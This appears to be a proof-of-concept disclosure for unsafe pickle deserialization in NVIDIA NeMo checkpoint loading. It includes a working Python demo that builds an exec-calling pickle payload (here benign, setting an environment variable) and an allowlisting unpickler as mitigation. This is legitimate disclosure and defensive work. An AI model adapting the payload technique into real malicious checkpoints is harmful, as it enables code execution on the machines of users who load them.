NVIDIA NeMo: Unsafe Deserialization PoC
Summary
The NVIDIA NeMo framework contains 41+ call sites of torch.load() without weights_only=True and one call to raw pickle.load(). Both paths deserialize arbitrary Python objects from the checkpoint file, so loading a crafted model checkpoint executes attacker-supplied code in the loading process.
Files
- malicious_nemo_model.ckpt: malicious NeMo checkpoint (triggers via torch.load())
- malicious_tabular_tokenizer.pkl: malicious pickle file (triggers via pickle.load())
Reproduction
```python
import torch
import pickle

# Loading the checkpoint without weights_only=True runs the pickle payload,
# exactly as NeMo does in 41+ locations.
state = torch.load("malicious_nemo_model.ckpt")

# Raw pickle.load() runs the payload, as NeMo does in tabular_tokenizer.py:44.
with open("malicious_tabular_tokenizer.pkl", "rb") as f:
    pickle.load(f)
```
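The reproduction above depends on the two checkpoint files shipped with this repo. The following is an added example, not code from this repo or from NeMo, that shows the same mechanism end to end without those files or a torch install: a pickle stream whose `__reduce__` entry asks the loader to call `builtins.exec`, the bare `pickle.load()` that executes it, and a restricted unpickler that refuses any global outside an allowlist, which is the approach `torch.load(weights_only=True)` takes. The marker variable name, the `_Payload` class and the `ALLOWED_GLOBALS` list are constructed for this example; the benign payload only sets an environment variable so its execution is observable.

```python
import io
import os
import pickle

# Marker set by the constructed payload when the loader executes it
# (name chosen for this example; nothing in NeMo uses it).
MARKER = "NEMO_PICKLE_POC_RAN"


class _Payload:
    """Object whose pickle stream instructs the unpickler to call builtins.exec."""

    def __reduce__(self):
        # pickle records (callable, args); on load the unpickler calls
        # exec(<source>) before any application code sees the result.
        return (exec, (f"import os; os.environ['{MARKER}'] = '1'",))


def build_payload() -> bytes:
    """Serialize the payload the way an attacker-controlled checkpoint would."""
    return pickle.dumps(_Payload())


def unsafe_load(data: bytes):
    """What bare pickle.load() / torch.load() without weights_only does:
    resolves and calls whatever global the stream names."""
    return pickle.load(io.BytesIO(data))


# Globals a real checkpoint legitimately needs. This is an assumed, deliberately
# small allowlist for the example; torch's weights_only unpickler ships its own.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
    ("torch", "FloatStorage"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves globals on the allowlist."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        # builtins.exec, os.system, subprocess.Popen, ... all end up here.
        raise pickle.UnpicklingError(
            f"refusing to resolve global {module}.{name}: not on the allowlist"
        )


def safe_load(data: bytes):
    """Hardened loader: raises UnpicklingError instead of executing the payload."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_load_rejects(data: bytes) -> bool:
    """True if the restricted loader refused the stream without executing it."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


def marker_set() -> bool:
    return os.environ.get(MARKER) == "1"


def clear_marker() -> None:
    os.environ.pop(MARKER, None)


if __name__ == "__main__":
    payload = build_payload()
    clear_marker()
    unsafe_load(payload)
    print("unsafe load executed payload:", marker_set())
    clear_marker()
    print("restricted load rejected payload:", safe_load_rejects(payload))
    print("payload executed during restricted load:", marker_set())
```

The allowlist is the whole control: `find_class` is the only point at which a pickle stream can name code to run, so refusing everything not explicitly needed for tensor reconstruction removes the primitive the PoC relies on. Note that `weights_only=True` is a real mitigation only on torch versions where it is implemented as a restricted unpickler, and it does nothing for the raw `pickle.load()` path, which needs to be replaced with a non-pickle format or an allowlisting unpickler like the one above.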
Impact
Loading a malicious .nemo or .ckpt checkpoint achieves full code execution in the process that loads it, with the privileges of that process. Because checkpoints are routinely downloaded and loaded from third-party sources, this is effectively Remote Code Execution. It affects the entire NeMo framework, including TTS, ASR, NLP, and multimodal models, since all of them go through the same checkpoint-loading paths.
Affected Version
NeMo v2.2.0+ (commit 530c684e5ceea7a3a73b5e0276e457ef1df489d0)